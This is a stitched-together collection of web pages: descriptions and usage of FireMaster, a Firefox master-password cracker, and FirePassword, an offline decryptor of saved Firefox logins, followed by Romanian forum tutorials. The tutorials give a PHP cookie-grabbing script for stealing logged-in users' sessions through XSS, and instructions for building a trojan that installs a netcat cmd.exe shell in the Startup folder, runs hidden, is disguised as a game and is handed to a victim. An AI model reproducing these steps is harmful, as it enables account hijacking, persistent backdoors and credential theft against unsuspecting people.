First public release of FireMaster SOURCE code.
Now it works at amazing speed of 50k passwords per second on normal m/c.
Firefox library dependency is removed completely.
For brute force, speed and time is displayed during operation.
Lots of optimizations and few bug fixes.
Thanks to 'T Barton' for reporting the bug with 1.5 version.

Version 1.5: 14th Jan 2006
Bug in parsing key3.db fixed.
Displaying results during recovery operation.
Speed is doubled compared to the original version.

Version 1.0: 1st Jan 2006
First public release of FireMaster.


About FireMaster
Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it. To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file.


About Firefox Password Manager and Master Password
Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This sign-on information is stored in the encrypted form in Firefox database files residing in user's profile directory. However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as FirePassword.

Hence to protect from such threats, Firefox uses master password to provide enhanced security. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view sign-on credentials.So if you have lost the master password, then you have lost all the stored credentials as well.

So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.

Internals of FireMaster
Once you have lost master password, there is no way to recover it as it is not stored at all. Whenever user enters the master password, Firefox uses it to decrypt the encrypted data associated with the known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses the similar technique to check for the master password, but in more optimized way. The entire operation goes like this.


* FireMaster generates passwords on the fly through various methods.
* Then it computes the hash of the password using known algorithm.
* Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").
* Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.


Firefox stores the details about encrypted string, salt, algorithm and version information in key database file key3.db in the user's profile directory. You can just copy this key3.db file to different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high end machine for faster recovery operation.

FireMaster supports following password generation methods

1) Dictionary Method
In this mode, FireMaster uses dictionary file having each word on separate line to perform the operation. You can find lot of online dictionary with different sizes and pass it on to Firemaster. This method is more quicker and can find out common passwords.

2) Hybrid Method
This is advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with generated word from known character list. This can find out password like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.

3) Brute Force Method
In this method, all possible combinations of words from given character list is generated and then subjected to cracking process. This may take long time depending upon the number of characters and position count specified.

How to use FireMaster?
First you need to copy the key3.db file to temporary directory. Later you have to specify this directory path for FireMaster as a last argument.

Here is the general usage information

Firemaster [-q]
[-d -f ]
[-h -f -n -g "charlist" [ -s | -p ] ]
[-b -m -l -c "charlist" -p "pattern" ]


Dictionary Crack Options:
-d Perform dictionary crack
-f Dictionary file with words on each line

Hybrid Crack Options:
-h Perform hybrid crack operation using dictionary passwords.
Hybrid crack can find passwords like pass123, 123pass etc
-f Dictionary file with words on each line
-g Group of characters used for generating the strings
-n Maximum length of strings to be generated using above character list
These strings are added to the dictionary word to form the password
-s Suffix the generated characters to the dictionary word(pass123)
-p Prefix the generated characters to the dictionary word(123pass)

Brute Force Crack Options:
-b Perform brute force crack
-c Character list used for brute force cracking process
-m [Optional] Specify the minimum length of password
-l Specify the maximum length of password
-p [Optional] Specify the pattern for the password


Sample Usage Information

// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt Firefox_Profile_Path

// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s Firefox_Profile_Path

// Brute Force Crack
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" Firefox_Profile_Path


Here Firefox_Profile_Path refers to the directory where key3.db file is present. This points to the Firefox profile directory (Ex: C:\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\) on your machine. However you can also copy key3.db file from any other machine such as Linux system to your local windows machine and specify that path during recovering operation.

Quiet mode ( -q option ) will disable printing each password while recovery is in progress. This makes it much faster especially for brute force operation. However during brute force operation if the password count exceeds 50000 passwords then it automatically enters the quiet mode.

Hybrid method tries normal dictionary password as well as password created by appending/prefixing the generated strings to the dictionary word. For example if the dictionary word is "test" and you have specified character set as '123' (-c 123 -s) then the new passwords will be test1, test12, test123, test32 etc.

Character list (-g for hybrid and -c for brute force) specifies the characters to be used for generating passwords. If you don't specify then the default character list is used. For brute force -m indicates the minimum length of password to be generated. This can reduce the generated passwords and hence the time considerably when large number of character set is specified. Similarly -l (small 'L') specifies the maximum length of password to be generated. For example, if you specify -m 6 and -l 8 then only passwords which are of length at least 6 and above but below 8 will be generated.

Now you can reduce the password cracking time significantly using pattern based password recovery mechanism. If you know that password is of certain length and also remember few characters then you can specify that pattern for brute force cracking. For example, assume that you have set the master password of length 12 and it begins with 'fire' and ends with '123' then command will look like below

FireMaster.exe -b -c "abyz" -l 12 -p "fire?????123" c:\testpath

This will reduce the time to seconds which otherwise would have taken days or hours to crack that password. You can even crack the impossible looking passwords using the right pattern.

FireMaster in Action




FireMaster and FireFox
FireMaster is tested with latest Firefox version and should work with any Firefox having version 1.0 or more.

If the FireMaster failed to work with your Firefox then please send me the key3.db and cert8.db (required for older versions) files which are present in your Firefox profile directory. Note that sign-on credentials are stored in the signons.txt file and key3.db just contains the master password related information. So even if some one knows your master password it will be useless unless he/she has access to signons.txt file.


Disclaimer
FireMaster is designed with good intention to recover the lost master password so that every one keep enjoying their experience with Firefox.Like any other tool its use either good or bad, depends upon the user who uses it. However author is not responsible for damages or impact caused due to misuse of FireMaster.


Acknowledgement
Thanks to the Mozilla-Firefox crew for making such an excellent, beautiful, free browser.

Thanks to everyone who shared their experience with FireMaster and sending the valuable feedbacks and suggestions.


Download FireMaster
If you want to build the FireMaster from the source then you need to download the Gecko SDK from Mozilla website.

http://securityxploded.com/download.php#firemaster
=====================================
Using firepassword

History

Version 2.0 : 3rd March 2007
Support for Firefox version 2.0. New signon format is explained below.
Few minor bug fixes and formatting of the result display.

Version 1.7 : 8th July 2006
Finally much awaited FirePassword source code is released under GPL v2.
Master Password checking is improved and now its done at beginning itself.
Removed the Gecko-SDK dependency completely.
Tested successfully with latest Firefox version 1.5.0.4

Version 1.6 : 25th Feb 2006
Few bug fixes here and there.
Thanks to Nemo for reporting the bug in base64 handling routine.

Version 1.5 : 14th Jan 2006
Static library dependency removed. Now libraries are loaded dynamically.
Support for wider range of Firefox versions.
Automatically detects Firefox profile directory if not specified.

Version 1.0 : 1st Jan 2006
First public release of FirePassword.


About FirePassword
FirePassword is the tool designed to decrypt the username and password list from firefox sign-on database. Firefox stores the username and password information for various sites in its database files. FirePassword works on similar line as Firefox's built-in password manager but it can be used as offline tool to get the username/password information without running the Firefox.


About Firefox Password Manager
Firefox has a built-in password manager tool which remembers username and passwords for all the visited websites. These credentials are stored in the encrypted from in Firefox database files mainly key3.db and signons.txt residing in user's profile directory. The key3.db file contains master password related information such as encrypted password check string, salt, algorithm and version information etc.

Signons.txt file contains following information

* Reject Host list : List of websites for which you don't want Firefox to remember the credentials.
* Normal Host List : Each host URL is followed by username and password.


Use of FirePassword
FirePassword is an alternative to Firefox's password manager tool. Main advantage of FirePassword is to use it as offline tool without running the Firefox. This is very useful during forensic investigation where one can copy the relevant files from the target system and view the credentials offline without affecting the environment of target system. Also pen testers can use it to view the credentials offline after retrieving sign-on files from the victim system.


Working of FirePassword
Firefox stores the sign-on credentials in signons.txt file located in the user profile directory. The structure of sign-on information in the signons.txt file (signons2.txt for version 2) is as follows.

For Firefox < version 2.0

* First comes the sign-on file header which is always "#2c"
* Next comes the reject host list in clear text, one per line and terminated with full stop.
* After that normal host list is stored in the following format
Host URL
Name (username or *password)
Value (encrypted)
.(full stop)

For Firefox >= version 2.0

* First comes the sign-on file header which is always "#2d"
* Next comes the reject host list in clear text, one per line and ends with full stop.
* After that normal host list is stored in the following format
Host URL
Name (username or *password)
Value (encrypted)
Subdomain URL
.(full stop)

Here each Host entry can have multiple username/password pairs. Starting from Firefox version 2.0, sub domain URL is also included along with username/password entry. If it is the password field then its name begins with '*'.Now once the username and password values (which are encrypted) are extracted, next task is to decrypt them. Information required to decrypt these values is stored in key3.db file. If the master password is set, then you must provide the master password to proceed with decryption. If you have forgotten the master password, then you can use Firemaster tool to recover the master password. If the master password is set and if you have not provided it, then FirePassword will prompt you to enter the master password.

Once you enter the password, FirePassword uses same decryption procedure used by Firefox to decrypt the sign-on information.


Using FirePassword
You have to copy the following files from the Firefox profile directory to temporary directory.

* key3.db
* cert8.db
* signons.txt

Here is the general usage information

FirePassword [-m "master password" ]
Options:
-m specify the master password

Firefox_Profile_Directory is the path to the directory where the above 3 files are present. If you don't specify the master password and its set, then you will be prompted to enter the master password before decryption.


FirePassword in Action




Testing FirePassword
FirePassword is tested with Firefox version 1.0, 1.5 to 2.0 and should work with any Firefox version 1.0 or more.

However if the FirePassword fails on your system, then please drop a mail to me about your Firefox version and any other details which will help in fixing the problem.


Disclaimer
FirePassword is designed with good intention. Like any tool its use either good or bad, depends upon the user who uses it. However author is not responsible for damage caused due to misuse of this tool.


Acknowledgement

* Thanks to the Mozilla-Firefox crew for making such an excellent, beautiful, free browser.
* Thanks to Stefano for informing and providing code to make the FirePassword to support Firefox version 2.0


Download FirePassword
FirePassword source code is released under GPL license. This will help you understand and enhance the features of FirePassword.

http://securityxploded.com/download.php#firepassword

Cum sa exploatezi un xss dupa ce l-ai gasit(pentru incepatori)

Marea majoritate ce gasesc posturi ale altor useri de pe acest forum si nu numai, ce contin site-uri vulnerabile la xss, isi pun intrebarea cu ce ii ajuta si cum se extrag.
XSS-u este o vulnerabilitate ce permite extragerea cookie-urilor userului care viziteaza link-ul ce contine xss. In cazul in care userul este logat, cookie-ul detine informatiile sesiunii de logare, asta inseamna ca daca il furam si il inlocuim cu al nostru, putem accesa contul victimei fara sa-i stim credintialele.

Presupunem ca am gasit o vulnerabilitate xss pe un anumit site. In primul rand avem nevoie de un site sau un server spre care cookie-ul va fi trimis. Presupunem ca aveti www.site-ulmeu.com. Puneti pe server un fisier denumit grab.php ce contine urmatorul cod php:

Code:

$cookie = $HTTP_GET_VARS["cgrab"];
$fh = fopen('cookies.txt', 'a');
fwrite($fh, $cookie . "\n\n");
?>

Uneori anumite servere nu permit crearea fisierului cookies.txt in cazul in care acesta nu exista, asa ca e bine sa-l creati voi, creati un fisier denumit "cookies.txt" si aveti grija ca acesta sa aiba drepturi de read si write.

Dupa cum ati vazut, xss-urile care sunt postate in general sunt de forma . Asta doar demonstreaza ca site-ul este vulnerabil la xss. Scriptul pe care voi trebuie sa-l folositi este acesta:

Code:

trimiteti link-ul cu xss-ul unui anumit user(care voi credeti ca este logat) iar cookie-ul va fi salvat in http://www.site-ulmeu.com/cookies.txt
trebuie doar sa le luati si sa le adaugati in folderul cookies de la internet explorer sau sa le inlocuiti cu cele actuale. Astfel veti fi logat cu sesiunea victimei si veti avea drepturi depline asupra contului sau.

IMPORTANT: acest tutorial are caracter informativ, orice actiune pe care o faceti este ilegala iar eu nu sunt respunzator de faptele voastre.
tutorial by crs12decoder

Conquiztador hax

Promo :

Link 2 za vid:

Code:

http://iruleyousuck.org/2009/01/22/conquiztador-cheating/

inca nu e gata , o sa fie soon =)

Cum sa facem un Trojan

MAI intai trebuie sa faceti rost de doua programe
1)nC.exe (net capture)-----------cred ca stie toata lume ce face!!! nu mai e cazul sa explic .

2)Quick Batch File----------------Transforma un fisier cu extensia bat in unul cu extensia exe ,si cel mai important
are o optiune care permite rulare fisierelor in hide mode

Boon si acum sa incepem . luam un folder si bagam in el nC.exe Porgramul nC.exe poate face un shell la CMD folosind
un port ales de noi.Asta o facem cu :

nc -l -p PORT-ul -d -e cmd.exe

iar apoi ne conectam la computer folosind comanda Telnet IP port (exemplu telnet 54.76.21.34 2000 )
ori putty; care il vreti mie sincer imi place mai mult putty

Daa... toate bune si frumoase in schimb ne izbim de o mare problema folosind comanda nc -l -p PORT-ul -d -e cmd.exe
nu ne putem conecta de mai multe ori asfel dupa fiecare conectare portul este inchis automat !! cea ce nu este bine de aceea
folosim un mic artificiu sa facem un program care sa imi permita sa ma pot connecta de mai multe ori la computerul victimei
in folderul de care spuneam mai devreme punem doua fisiere care au extensia bat.Iar apoi incepem sa le scriem asfel ;
Doua fisiere
1)Start.bat
2)System.bat

In fisierul Start.bat scriem :

copy nc.exe c:windowstemp
copy System.exe c:windowstemp
c:
cd
cd "Cocuments and SettingsAll UsersStart MenuProgramsStartup"
copy c:windowstempSystem.exe
System.exe

Ce face acest program ?! Simplu copie cele doua fisiere in c:windowstemp si apoi copie un singur fisier (system.exe)in Cocuments and SettingsAll UsersStart MenuProgramsStartup

Boon assta inseamna ca de fiecare data cand ala aprinde calc i se va executa automat System.exe dar ce e asa de important D`le fisieru asta?!
Smplu System.exe are urmatoarele line



C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
.................................................. ..............................
............


de mai multe ori !!de vreo 100 de ori !
dupa aia fisierul System.bat il compilam cu Quick Batch File si avem un fisier System.exe
ATENTIE!!! trebuie a aiba optiunea HIDE MODE activa!!! pt ca executarea a se faca ascnus fara ca victima sa vada!!
daca vreti si sunteti mai luxosi puteti sa compilati si START.bat si sa ii schimbati pictograma in ua rmoasa de la un joc de ex si ii dati la un lamer si gata!

Avantaje e mic are 352 Kb nu il vede nici un antivirus